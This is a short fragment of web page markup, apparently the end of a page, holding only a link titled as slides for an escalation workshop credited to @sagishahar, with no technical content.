Escalation Workshop - Slides.pdf - @sagishahar</a></li></ul></div></article></body></html>